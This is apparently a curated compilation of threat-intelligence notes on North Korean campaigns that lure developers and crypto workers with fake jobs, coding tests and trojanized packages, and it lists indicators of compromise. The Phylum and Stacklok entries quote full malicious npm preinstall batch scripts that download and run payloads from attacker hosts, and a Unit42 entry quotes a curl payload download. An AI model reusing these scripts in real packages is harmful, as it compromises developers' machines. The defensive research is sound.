US court orders forfeiture of 279 crypto accounts tied to North Korea laundering

Exclusive: North Korea laundered $147.5 mln in stolen crypto in March, say UN experts

DPRK IT | Thousands of North Koreans stole Americans’ identities and took remote-work tech jobs at Fortune 500 companies, DOJ says

Microsoft: Moonstone Sleet emerges as new North Korean threat actor with new bag of tricks

  • Date:: 2024-05-28
  • https://microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/
  • https://advantage.mandiant.com/reports/22-00021780
  • formerly Storm-1789
  • Moonstone Sleet is observed to set up fake companies and job opportunities to engage with potential targets, employ trojanized versions of legitimate tools, create a fully functional malicious game, and deliver a new custom ransomware.
  • While Moonstone Sleet initially had overlaps with Diamond Sleet, the threat actor has since shifted to its own infrastructure and attacks, establishing itself as a distinct, well-resourced North Korean threat actor.
  • Moonstone Sleet is a threat actor behind a cluster of malicious activity that Microsoft assesses is North Korean state-aligned and uses both a combination of many tried-and-true techniques used by other North Korean threat actors and unique attack methodologies. When Microsoft first detected Moonstone Sleet activity, the actor demonstrated strong overlaps with Diamond Sleet, extensively reusing code from known Diamond Sleet malware like Comebacker and using well-established Diamond Sleet techniques to gain access to organizations, such as using social media to deliver trojanized software. However, Moonstone Sleet quickly shifted to its own bespoke infrastructure and attacks. Subsequently, Microsoft has observed Moonstone Sleet and Diamond Sleet conducting concurrent operations, with Diamond Sleet still utilizing much of its known, established tradecraft.
  • Moonstone Sleet has an expansive set of operations supporting its financial and cyberespionage objectives. These range from deploying custom ransomware to creating a malicious game, setting up fake companies, and using IT workers.
  • In early August 2023, Microsoft observed Moonstone Sleet delivering a trojanized version of PuTTY, an open-source terminal emulator, via apps like LinkedIn and Telegram as well as developer freelancing platforms. Often, the actor sent targets a .zip archive containing two files: a trojanized version of putty.exe and url.txt, which contained an IP address and a password. If the provided IP and password were entered by the user into the PuTTY application, the application would decrypt an embedded payload, then load and execute it. Notably, before Moonstone Sleet used this initial access vector, Microsoft observed Diamond Sleet using a similar method – trojanized PuTTY and SumatraPDF — with comparable techniques for anti-analysis, as we reported in 2022
  • Since February 2024, Microsoft has observed Moonstone Sleet infecting devices using a malicious tank game it developed called DeTankWar (also called DeFiTankWar, DeTankZone, or TankWarsZone). DeTankWar is a fully functional downloadable game that requires player registration, including username/password and invite code. In this campaign, Moonstone Sleet typically approaches its targets through messaging platforms or by email, presenting itself as a game developer seeking investment or developer support and either masquerading as a legitimate blockchain company or using fake companies. To bolster the game’s superficial legitimacy, Moonstone Sleet has also created a robust public campaign that includes the websites detankwar.com and defitankzone.com, and many X (Twitter) accounts for the personas it uses to approach targets and for the game itself.
  • Moonstone Sleet used a fake company called C.C. Waterfall to contact targets. The email presented the game as a blockchain-related project and offered the target the opportunity to collaborate, with a link to download the game included in the body of the message. More details about C.C. Waterfall and another fake company that Moonstone Sleet set up to trick targets are included below:
  • Since January 2024, Microsoft has observed Moonstone Sleet creating several fake companies impersonating software development and IT services, typically relating to blockchain and AI. The actor has used these companies to reach out to potential targets, using a combination of created websites and social media accounts to add legitimacy to their campaigns.
  • From January to April 2024, Moonstone Sleet’s fake company StarGlow Ventures posed as a legitimate software development company. The group used a custom domain, fake employee personas, and social media accounts, in an email campaign targeting thousands of organizations in the education and software development sectors. In the emails Moonstone Sleet sent as part of this campaign, the actor complimented the work of the targeted organization and offered collaboration and support for upcoming projects, citing expertise in the development of web apps, mobile apps, blockchain, and AI.
  • bestonlinefilmstudio.org
  • blockchain-newtech.com
  • ccwaterfall.com
  • chaingrown.com
  • defitankzone.com
  • detankwar.com
  • freenet-zhilly.org
  • matrixane.com
  • pointdnt.com
  • starglowventures.com
  • mingeloem.com

From Opportunity to Threat: My Encounter with a Blockchain Job Scam

Mandiant: UNC4899 - Insights on Cyber Threats Targeting Users and Enterprises in Brazil

  • Date:: 2024-06-12
  • https://cloud.google.com/blog/topics/threat-intelligence/cyber-threats-targeting-brazil
  • North Korean Government-Backed Groups Targeting Brazil
  • Since 2020, North Korean cyber actors have accounted for approximately a third of government-backed phishing activity targeting Brazil. North Korean government-backed actors have targeted the Brazilian government and Brazil’s aerospace, technology, and financial services sectors. Similar to their targeting interests in other regions, cryptocurrency and financial technology firms have been a particular focus, and at least three North Korean groups have targeted Brazilian cryptocurrency and fintech companies.
  • In early 2024, PUKCHONG (UNC4899) targeted cryptocurrency professionals in multiple regions, including Brazil, using a Python app that was trojanized with malware. To deliver the malicious app, PUKCHONG reached out to targets via social media and sent a benign PDF containing a job description for an alleged job opportunity at a well known cryptocurrency firm. If the target replied with interest, PUKCHONG sent a second benign PDF with a skills questionnaire and instructions for completing a coding test. The instructions directed users to download and run a project hosted on GitHub. The project was a trojanized Python app for retrieving cryptocurrency prices that was modified to reach out to an attacker-controlled domain to retrieve a second stage payload if specific conditions were met.
  • North Korean government-backed groups have also in the past targeted Brazil’s aerospace and defense industry. In one example, PAEKTUSAN created an account impersonating an HR director at a Brazilian aerospace firm and used it to send phishing emails to employees at a second Brazilian aerospace firm. In a separate campaign, PAEKTUSAN masqueraded as a recruiter at a major US aerospace company and reached out to professionals in Brazil and other regions via email and social media about prospective job opportunities. Google blocked the emails, which contained malicious links to a DOCX file containing a job posting lure that dropped AGAMEMNON, a downloader written in C++. The attacker also likely attempted to deliver the malware via messages on social media and chat applications like WhatsApp. The campaigns were consistent with Operation Dream Job and activity previously described by Google. In both campaigns, we also sent users government-backed attacker alerts notifying them of the activity and sharing information about how to keep their accounts safe.
  • One North Korean group, PRONTO, concentrates on targeting diplomats globally, and their targets in Brazil follow this pattern. In one case, Google blocked a campaign that used a denuclearization-themed phishing lure and the group’s typical phishing kit - a fake PDF viewer that presents the users with a login prompt to enter their credentials in order to view the lure document. In another case, PRONTO used North Korea news-themed lures to direct diplomatic targets to credential harvesting pages.
  • One of the emerging trends we are witnessing globally from North Korean threat activity today is the insider threat posed by North Korean nationals gaining employment surreptitiously at corporations to conduct work in various IT roles. Though we have not yet observed direct connections between any of these North Korean IT workers and Brazilian enterprises, we note the potential for it to present a future risk given the growing startup ecosystem in Brazil, historical activity by North Korean threat actors in Brazil, and expansiveness of this problem.

"Crypto folks (hopefully) already know that Lazarus is one of the most prevalent threat actors targeting this industry..."

⭐ Phylum: New Tactics from a Familiar Threat

  • Date:: 2024-07-08
  • https://blog.phylum.io/new-tactics-from-a-familiar-threat/
  • https://otx.alienvault.com/indicator/domain/cryptocopedia.com
  • It contained all the functional code and tests from call-bind but with a modified package.json file and five additional files: shim.js, polyfill.js, implementation.js, callTo.js, and mod.json
  • '@echo off\ncurl -o funData.ctr -L "https://cryptocopedia.com/explorer/search.asp?token=5032" > nul 2>&1\nstart /b /wait powershell.exe -ExecutionPolicy Bypass -File towr.ps1 > nul 2>&1\ndel "towr.ps1" > nul 2>&1\nif exist "stringh.dat" (\ndel "stringh.dat" > nul 2>&1\n)\nrename colfunc.csv stringh.dat > nul 2>&1\nif exist "stringh.dat" (\nrundll32 stringh.dat, SetExpVal tiend\n)\nif exist "mod.json" (\ndel "package.json" > nul 2>&1\nrename mod.json package.json > nul 2>&1\n)\nping 127.0.0.1 -n 2 > nul\nif exist "stringh.dat" (\ndel "stringh.dat" > nul 2>&1\n)';
  • call-bind
  • call-blockflow
  • react-tooltip-modal
  • The third part replaces the original package.json with the contents of mod.json to remove the preinstall script

Decipher: New Version of BeaverTail macOS Malware Identified

Patrick Wardle: This Meeting Should Have Been an Email (BeaverTail)

KnowBe4: How a North Korean Fake IT Worker Tried to Infiltrate Us

U.S. DOJ: North Korean Government Hacker Charged for Involvement in Ransomware Attacks Targeting U.S. Hospitals and Health Care Providers (Andariel)

⭐ North Korean State Actors Exploit Open Source Supply Chain via Malicious npm Package

  • Date:: 2024-07-24
  • https://stacklok.com/blog/north-korean-state-actors-exploit-open-source-supply-chain-via-malicious-npm-package
  • node <script>.js && del <script>.js
  • '@echo off\ncurl -o though.crt -L "http://166.88.61.72/explorer/search.asp?token=3092" > nul 2>&1\nstart /b /wait powershell.exe -ExecutionPolicy Bypass -File yui.ps1 > nul 2>&1\ndel "yui.ps1" > nul 2>&1\nif exist "soss.dat" (\ndel "soss.dat" > nul 2>&1\n)\nrename tmpdata.db soss.dat > nul 2>&1\nif exist "soss.dat" (\nrundll32 soss.dat, SetExpVal tiend\n)\nif exist "mod.json" (\ndel "package.json" > nul 2>&1\nrename mod.json package.json > nul 2>&1\n)\nping 127.0.0.1 -n 2 > nul\nif exist "soss.dat" (\ndel "soss.dat" > nul 2>&1\n)'
  • Datacenter, xTom, Hong Kong, Evoxt (HK) -- https://app.spur.us/context?q=166.88.61.72
  • Second-stage DLL - soss.dat 43a28fc5a1ee46da0e5698fed473802ab6af5f83233b9287459ec2e0f6250efa
  • next-react-notify
  • call-bind
  • tocall.js B57b75d015526b862ae469b825c7a18a157927e0c9415050f1abe9df67523520
  • next-react-notify-1.0.0.tgz 337c114002a8b25b1ee47546b637391d413a2bfb7275c439c8758a23fc77e441
  • https://github.com/StacklokLabs/jail/tree/main/npm/next-react-notify

APT45: North Korea’s Digital Military Machine

⭐ Checkmarx: A Year-Long Campaign of North Korean Actors Targeting Developers via Malicious npm Packages

⭐ Contagious Interview - Malicious npm Packages

North Korean threat actor Citrine Sleet exploiting Chromium zero-day (CVE-2024-7971)

FBI: North Korea Aggressively Targeting Crypto Industry with Well-Disguised Social Engineering Attacks

  • Date::2024-09-03
  • https://ic3.gov/Media/Y2024/PSA240903
  • The FBI has observed the following list of potential indicators of North Korean social engineering activity:
  • Requests to execute code or download applications on company-owned devices or other devices with access to a company’s internal network.
  • Requests to conduct a "pre-employment test" or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
  • Offers of employment from prominent cryptocurrency or technology firms that are unexpected or involve unrealistically high compensation without negotiation.
  • Offers of investment from prominent companies or individuals that are unsolicited or have not been proposed or discussed previously.
  • Insistence on using non-standard or custom software to complete simple tasks easily achievable through the use of common applications (i.e. video conferencing or connecting to a server).
  • Requests to run a script to enable call or video teleconference functionalities supposedly blocked due to a victim's location.
  • Requests to move professional conversations to other messaging platforms or applications.
  • Unsolicited contacts that contain unexpected links or attachments.

Mandiant: DeFied Expectations — Examining Web3 Heists

  • Date: 2024-09-03
  • https://cloud.google.com/blog/topics/threat-intelligence/examining-web3-heists
  • Crypto exchange heists typically involve a series of events that map to the Targeted Attack Lifecycle. Recent findings from Mandiant heist investigations have identified social engineering of developers via fake job recruiting with coding tests as a common initial infection vector. The following screenshots (Figure 1) are from a recent heist investigation where an engineer was contacted about a fake job opportunity via LinkedIn by a DPRK threat actor. After an initial chat conversation, the attacker sent a ZIP file that contained COVERTCATCH malware disguised as a Python coding challenge, which compromised the user’s macOS system by downloading a second-stage malware that persisted via Launch Agents and Launch Daemons.
  • Recently, Mandiant observed a similar recruiting theme which delivered a malicious PDF disguised as a job description for “VP of Finance and Operations” at a prominent crypto exchange. The malicious PDF dropped a second-stage malware known as RUSTBUCKET which is a backdoor written in Rust that supports file execution. The backdoor collects basic system information, communicates to a URL provided via the command-line, and in this instance persisted, via a Launch Agent disguised as “Safari Update” with a command-and-control (C2 or C&C) domain autoserverupdate.line.pm.
  • The following snippet shows example decrypted AWS EC2 SSM Parameters identified in AWS CloudTrail logs from a heist investigation. These decrypted SSM Parameters included the private keys, usernames, and passwords for an exchange’s production cryptocurrency wallets. Approximately one hour later the wallets were drained resulting in a loss of over $100 million.

APT Lazarus: Eager Crypto Beavers, Video calls and Games

  • Date:: 2024-09-04
  • https://group-ib.com/blog/apt-lazarus-python-scripts/
  • Contagious Interview, BeaverTail, InvisibleFerret, FCCCall
  • Recent Python scripts, including the CivetQ and BeaverTail malware variants, along with their updated versions in Windows and Python releases
  • Campaign begins with a fictitious job interview, tricking job-seekers into downloading and running a Node.js project which contains the BeaverTail malware, which in turn delivers the Python backdoor known as InvisibleFerret. BeaverTail was first discovered by PANW researchers as a Javascript malware in November 2023, but recently a native macOS version of BeaverTail was discovered in July 2024.
  • Actively searching for potential victims on other job search platforms such as WWR, Moonlight, Upwork,and others
  • freeconference.io
  • mirotalk.net
  • The malicious Javascript code is buried within these repositories. The following are examples of a trojanized repository, where the node server/server.js command was added to the “scripts” property in package.json. Here, server/server.js serves as the initial entry point, which in turn loads the malicious script in middlewares/helpers/error.js.

Threat Assessment: North Korean Threat Groups

  • Date:: 2024-09-09
  • https://unit42.paloaltonetworks.com/threat-assessment-north-korean-threat-groups-2024/
  • Lazarus has been used in public reporting as an umbrella term for threat actors from the Democratic People's Republic of Korea (DPRK), commonly referred to as North Korea. However, many of these threat actors can be classified into different groups under the Reconnaissance General Bureau (RGB) of the Korean People's Army.
  • Over the years, the RGB has revealed at least six threat groups

ReversingLabs: Fake recruiter coding tests target devs with malicious Python packages

  • Date:: 2024-09-10
  • https://reversinglabs.com/blog/fake-recruiter-coding-tests-target-devs-with-malicious-python-packages
  • VMConnect, first identified in August 2023
  • Python_Skill_Assessment.zip and Python_Skill_Test.zip
  • New samples were tracked to GitHub projects that have been linked to previous, targeted attacks in which developers are lured using fake job interviews. Furthermore, information gathered from the detected samples allowed us to identify one compromised developer and provided insights into an ongoing campaign, with attackers posing as employees of major financial services firms.
  • The malicious code was contained in altered pyperclip and pyrebase modules. The malicious code is present in both the init.py file and its corresponding compiled Python file (PYC) inside the pycache directory of respective modules.
  • Searching open source information for the name led us to a GitHub profile of the developer. After establishing contact with the developer, we confirmed that he had fallen victim to the malicious actor pretending to be a recruiter from Capital One in January, 2024. In an email exchange with ReversingLabs, he revealed that he had been contacted from a LinkedIn profile and provided with a link to the GitHub repository as a “homework task.” The developer was asked to “find the bug,” resolve it and push changes that addressed the bug. When the changes were pushed, the fake recruiter asked him to send screenshots of the fixed bug — to make sure that developer executed the project on his machine.
  • Github:: ponpon262612

Developers Beware: Lazarus Group Uses Fake Coding Tests to Spread Malware

  • Date:: 2024-09-11
  • Malicious code embedded within modified versions of legitimate PyPI libraries such as pyperclip and pyrebase.
  • init.py file and its corresponding compiled Python file (PYC) inside the pycache directory of respective modules
  • requiring job seekers to build a Python project shared in the form of a ZIP file within five minutes and find and fix a coding flaw in the next 15 minutes.
  • Capital One and Rookery Capital Limited

⭐ Jamf: Targeted attacks amid FBI Warnings

  • Date:: 2024-09-16
  • https://jamf.com/blog/jamf-threat-labs-observes-targeted-attacks-amid-fbi-warnings/
  • On September 3, 2024 the Federal Bureau of Investigations (FBI) released a public service announcement set to warn those in the Crypto Industry that the Democratic People's Republic of Korea ("DPRK" aka North Korea) has been targeting individuals by using clever social engineering techniques for the successful delivery of malware.
  • Humans have long been considered the weakest link in the cybersecurity chain, and attackers continue to exploit this vulnerability through increasingly sophisticated social engineering tactics. Social engineering schemes often target individuals through professional networking platforms, making users the first line of defense but also the most vulnerable.
  • “The actors may also impersonate recruiting firms or technology companies backed by professional websites designed to make the fake entities appear legitimate.”
  • Requests to conduct a "pre-employment test" or debugging exercise that involves executing non-standard or unknown Node.js packages, PyPI packages, scripts, or GitHub repositories.
  • TestProject/SlackToCsv.csproj
  • taurihostmetrics[.]com
  • wiresapplication[.]com
  • zsh_env communicates with juchesoviet48[.]com
  • The other stage two malware that is downloaded (zsh_env) simply sets up persistence via the .zshrc configuration. This ensures that any time the user opens a zsh shell moving forward, the malware will also be executed. This is a technique that likely ends up being reliable given the attacker knows they’re targeting a developer who will likely use the Terminal, again causing the backdoor to be run in the background.
  • 51a88646f9770e09b3505bd5cbadc587abb952ba - Project.zip (Coding Challenge)

Is Rookery Capital a scam?

  • Date:: 2024-09-17
  • https://www.reddit.com/r/Scams/comments/1f30stp/is_rookery_capital_limited_a_scam/
  • Couple days ago I was reached by Mattiass Hansson on Telegram with a job offer. Then I got added to Rookery Capital Recruitment Slack channel and this started to look suspicious.
  • First of all I did go through a lot of recruitment processes but none of them was run through Slack. People on the Slack seems to be bots or fake personalities (ex. Emily Evelyn, Sonia Clark their profile images are stocks or rockstar pics). There is no information about the company online except registration in UK. They're unable to give a description of the position except some very vague words. They're build a sence of urgency in how they deal with me.

Mandiant: An Offer You Can Refuse: UNC2970 Backdoor Deployment Using Trojanized PDF Reader

  • Date:: 2024-09-17
  • https://cloud.google.com/blog/topics/threat-intelligence/unc2970-backdoor-trojanized-pdf-reader/
  • Mandiant Managed Defense has reported similar activity in 2022 attributed to UNC4034, which later got merged into UNC2970.
  • UNC2970 targets victims under the guise of job openings, masquerading as a recruiter for prominent companies. Mandiant has observed UNC2970 copy and tailor job descriptions to fit their respective targets.
  • UNC2970 engaged with the victim over email and WhatsApp and ultimately shared a malicious archive that is purported to contain the job description in PDF file format. The PDF file has been encrypted and can only be opened with the included trojanized version of SumatraPDF to ultimately deliver MISTPEN backdoor via BURNBOOK launcher.
  • Mandiant observed UNC2970 modify the open source code of an older SumatraPDF version as part of this campaign. This is not a compromise of SumatraPDF, nor is there any inherent vulnerability in SumatraPDF. Upon discovery, Mandiant alerted SumatraPDF of this campaign for general awareness.
  • UNC2970 relies on legitimate job description content to target victims employed in U.S. critical infrastructure verticals. The job description is delivered to the victim in a password-protected ZIP archive containing an encrypted PDF file and a modified version of an open-source PDF viewer application.
  • For example, under the "Required Education, Experience, & Skills" section, the original post mentions "United States Air Force or highly comparable experience," while the malicious PDF omits this line. Another omitted line is under the "Preferred Education, Experience, & Skills" section, where the original job description includes "Preferred location McLean, Virginia."
  • BAE_VICE President of Business Development.pdf - An encrypted file containing both the PDF lure displayed to the user and the MISTPEN backdoor
  • libmupdf.dll PdfFilter.dll SumatraPDF.exe
  • This MISTPEN sample communicates over HTTP with the following Microsoft Graph URLs:
  • login.microsoftonline.com/common/oauth2/v2.0/token
  • graph.microsoft.com/v1.0/me/drive/root:/path/upload/hello/
  • graph.microsoft.com/v1.0/me/drive/root:/path/upload/world/
  • graph.microsoft.com/v1.0/me/drive/items/
  • The backdoor reads configuration data from the file setup.bin if it exists within the same directory. The configuration data includes the sleep time and an ID. The backdoor sleeps for the configured time and sends the message "Hi,I m just woke up!" to its command-and-control (C2 or C&C) server.

Code of Conduct: DPRK’s Python-fueled intrusions into secured networks

  • Date:: 2024-09-17
  • https://elastic.co/security-labs/dprk-code-of-conduct
  • Investigating the DPRK’s strategic use of Python and carefully crafted social engineering, this publication sheds light on how they breach highly secure networks with evolving and effective cyber attacks.
  • The main PasswordManager.py file looks like the makings of a basic Python password manager application. Of course, as we noted above, the application imports two third-party modules (Pyperclip and Pyrebase) into this main script.
  • The script within the Pyperclip package exhibits clear signs of malicious behavior, using obfuscation techniques like ROT13 and Base64 encoding to hide its true intent. It identifies the operating system and adapts its actions accordingly, writing to disk and executing an obfuscated Python script in the system’s temporary directory. The script establishes communication with a remote server, enabling remote code execution (RCE) and allowing the attacker to send further commands. This carefully concealed process ensures the script runs stealthily, avoiding detection while maintaining effective C2 (Command and Control) over the infected machine.
  • This lure again masquerades as a Python coding challenge delivered under the guise of a job interview. Its Python code implementation matches exactly the code we’ve analyzed above, and based on description and filename, it matches the lure described by Mandiant as “CovertCatch.”
  • The next lure is different from the previous ones but matches the Python code implementation we have seen and written about previously. Last year, we brought to light the malware known as “KandyKorn” that targeted CryptoCurrency developers and engineers.

Gleaming Pisces / AppleJeus Poisoned Python Packages Campaign Delivers PondRAT Linux and MacOS Backdoors

  • Date:: 2024-09-18
  • https://unit42.paloaltonetworks.com/gleaming-pisces-applejeus-poolrat-and-pondrat/
  • Linux and macOS backdoors via infected Python software packages
  • PondRAT POOLRAT
  • FConnectProxy and AcceptRequest
  • real-ids (versions 0.0.3 - 0.0.5)
  • coloredtxt (version 0.0.2)
  • beautifultext (version 0.0.1)
  • minisound (version 0.0.2)
  • curl --silent https://arcashop[.]org/boards.php?type=! --cookie oshelper_session=[REDACTED] --output /home/[REDACTED]/oshelper
  • 973f7939ea03fd2c9663dafc21bb968f56ed1b9a56b0284acf73c3ee141c053c
  • os_helper bfd74b4a1b413fa785a49ca4a9c0594441a3e01983fc7f86125376fdbd4acf6b
  • jdkgradle[.]com
  • rebelthumb[.]net cbf4cfa2d3c3fb04fe349161e051a8cf9b6a29f8af0c3d93db953e5b5dc39c86
  • www.talesseries[.]com/write.php
  • rgedist[.]com/sfxl.php
  • KyPay Wallet Connections
  • kupayupdate_stage2 (SHA256: 91eaf215be336eae983d069de16630cc3580e222c427f785e0da312d0692d0fd)
  • When examining its code, we observed several similarities to the Linux RAT. This included the function names FConnectProxy and AcceptRequest, and similar code execution flow.
  • In a 2021 report, CISA identified a macOS RAT dubbed prtspool (SHA256: 5e40d106977017b1ed235419b1e59ff090e1f43ac57da1bb5d80d66ae53b1df8), used as the final payload in one of the AppleJeus (CoinGoTrade) attack waves. Mandiant's analysis of the 3CX supply chain attack also mentioned this RAT family. They reported that attackers used the POOLRAT malware to compromise 3CX’s macOS build environment.
  • ESET has also identified similarities between POOLRAT and a backdoor called BADCALL for Linux, also attributed to Gleaming Pisces. Figure 7 below shows the execution prevention of the POOLRAT macOS backdoor.

Mandiant: UNC5267 - Staying a Step Ahead: Mitigating the DPRK IT Worker Threat

  • Date:: 2024-09-23
  • https://cloud.google.com/blog/topics/threat-intelligence/mitigating-dprk-it-worker-threat
  • UNC5267 is not a traditional, centralized threat group. IT workers consist of individuals sent by the North Korean government to live primarily in China and Russia, with smaller numbers in Africa and Southeast Asia. Their mission is to secure lucrative jobs within Western companies, especially those in the U.S. tech sector.
  • Financial gain through illicit salary withdrawals from compromised companies
  • Maintaining long-term access to victim networks for potential future financial exploitation
  • Potential use of access for espionage or disruptive activity (though this hasn't been definitively observed)
  • daniel-ayala.netlify.app
  • 103.244.174.154 - Cybernet (PK)
  • 104.129.55.3 - QuadraNet (US)
  • 104.206.40.138 - Eonix Corporation - AstrillVPN (US)
  • 104.223.97.2 - QuadraNet (US)
  • 104.223.98.2 - QuadraNet (US)
  • 104.243.33.74 - ReliableSite.Net LLC (US)
  • 104.250.148.58 - GorillaServers - AstrillVPN (US)
  • 109.82.113.75 - Mobily (SA)
  • 113.227.237.46 - China Unicom (CN)
  • 119.155.190.202 - Ufone (PK)
  • 123.190.56.214 - China Unicom (CN)
  • 155.94.255.2 - QuadraNet (US)
  • 174.128.251.99 - Sharktech - AstrillVPN (US)
  • 18.144.99.240 - Amazon.com (US)
  • 184.12.141.109 - Frontier Communications (US)
  • 192.119.10.67 - 24 Shells - AstrillVPN (US)
  • 192.119.11.250 - 24 Shells - AstrillVPN (US)
  • 192.74.247.161 - Peg Tech - AstrillVPN (US)
  • 198.135.49.154 - Majestic Hosting Solutions, LLC - AstrillVPN (US)
  • 198.2.228.20 - Peg Tech - AstrillVPN (US)
  • 198.23.148.18 - ColoCrossing (US)
  • 199.115.99.34 - Sharktech - AstrillVPN (US)
  • 204.188.232.195 - Sharktech - AstrillVPN (US)
  • 207.126.89.11 - Hurricane Electric (US)
  • 208.68.173.244 - Atlantic Metro Communications (US)
  • 23.105.155.2 - Leaseweb New York (US)
  • 23.237.32.34 - Fdcservers (US)
  • 3.15.4.158 - Amazon.com (US)
  • 37.19.199.133 - Datacamp Limited (US)
  • 37.19.221.228 - Datacamp Limited (US)
  • 37.43.225.43 - Mobily (SA)
  • 38.140.49.92 - Cogent Communications - AstrillVPN (US)
  • 38.42.94.148 - Starry (US)
  • 42.84.228.232 - China Unicom (CN)
  • 5.244.93.199 - Mobily (SA)
  • 50.39.182.185 - Ziply Fiber (US)
  • 51.39.228.134 - Zain Saudi Arabia (SA)
  • 54.200.217.128 - Amazon.com (US)
  • 60.20.1.234 - China Unicom (CN)
  • 66.115.157.242 - Performive (US)
  • 67.129.13.170 - CenturyLink (US)
  • 67.82.9.140 - Optimum Online (US)
  • 68.197.75.194 - Optimum Online (US)
  • 70.39.103.3 - Sharktech - AstrillVPN (US)
  • 71.112.196.114 - Verizon Fios Business (US)
  • 71.112.196.115 - Verizon Fios Business (US)
  • 72.193.13.228 - Cox Communications (US)
  • 74.222.20.18 International - AstrillVPN (US)
  • 74.63.233.50 - Limestone Networks - AstrillVPN (US)
  • 98.179.96.75 - Cox Communications (US)

Dozens of Fortune 100 companies have unwittingly hired North Korean IT workers, according to report

SentinelOne: BlueNoroff Hidden Risk - Threat Actor Targets Macs with Fake Crypto News and Novel Persistence

  • Date: 2024-11-07
  • https://www.sentinelone.com/labs/bluenoroff-hidden-risk-threat-actor-targets-macs-with-fake-crypto-news-and-novel-persistence/
  • Hidden Risk Behind New Surge of Bitcoin Price”
  • “Altcoin Season 2.0-The Hidden Gems to Watch”
  • “New Era for Stablecoins and DeFi, CeFi”
  • 23.254.253.75
  • 45.61.128.122
  • 45.61.135.105
  • 45.61.140.26
  • 144.172.74.23
  • 144.172.74.141
  • 172.86.108.47
  • 216.107.136.10
  • analysis.arkinvst[.]com
  • appleaccess[.]pro
  • arkinvst[.]com
  • atajerefoods[.]com
  • buy2x[.]com
  • calendly[.]caladan[.]video
  • cardiagnostic[.]net
  • cmt[.]ventures
  • community.edwardcaputo[.]shop
  • community.kevinaraujo[.]shop
  • community.selincapital[.]com
  • customer-app[.]xyz
  • delphidigital[.]org
  • doc.solanalab[.]org
  • dourolab[.]xyz
  • drogueriasanjose[.]net
  • edwardcaputo[.]shop
  • email.sellinicapital[.]com
  • evalaskatours[.]com
  • happyz[.]one
  • hwsrv-1225327.hostwindsdns[.]com
  • info.ankanimatoka[.]com
  • info.customer-app[.]xyz
  • kevinaraujo[.]shop
  • maelstromfund[.]org
  • maelstroms[.]fund
  • matuaner[.]com
  • mc.tvdhoenn[.]net
  • meet.caladan[.]video
  • meet.caladangroup[.]xyz
  • meet.hananetwork[.]video
  • meet.selinicapital[.]info
  • meet.selinicapital[.]online
  • meet.selinicapital[.]xyz
  • meet.sellinicapital[.]com
  • meeting.sellinicapital[.]com
  • meeting.zoom-client[.]com
  • mg21.1056[.]uk
  • nodnote.com
  • online.selinicapital[.]info
  • online.zoom-client[.]com
  • panda95sg[.]asia
  • pixelmonmmo[.]net
  • presentations[.]life
  • selincapital[.]com
  • selinicapital[.]info
  • selinicapital[.]network
  • selinicapital[.]online
  • sellinicapital[.]com
  • sendmailed[.]com
  • sendmailer[.]org
  • shh5.baranftw[.]xyz
  • tvdhoenn[.]net
  • verify.selinicapital[.]info
  • versionupdate.dns[.]army
  • www.buy2x[.]com
  • www.delphidigital[.]org
  • www.frameworks[.]ventures
  • www.happyz[.]one
  • www.huspot[.]blog
  • www.maelstromfund[.]org
  • www.panda95sg[.]asia
  • www.prismlab[.]xyz
  • www.sellinicapital[.]com
  • www.sendmailed[.]com
  • www.sendmailer[.]org
  • www.yoannturp[.]xyz
  • xu10.1056[.]uk
  • zoom-client[.]com

Microsoft shares latest intelligence on North Korean and Chinese threat actors at CYBERWARCON

Chainalysis: $2.2 Billion Stolen from Crypto Platforms in 2024, but Hacked Volumes Stagnate Toward Year-End as DPRK Slows Activity Post-July

  • Date:: 2024-12-19
  • https://www.chainalysis.com/blog/crypto-hacking-stolen-funds-2025/
  • Note that, in last year’s report, we published that the DPRK stole $1.0 billion across 20 hacks. Upon further investigation, we determined that certain large hacks we had previously attributed to the DPRK are likely no longer related, hence the decrease to $660.50 million. However, the number of incidents remains the same, as we identified other smaller hacks attributed to the DPRK. We aim to constantly re-evaluate our assessment of DPRK-linked hacking events as we acquire new on-chain and off-chain evidence.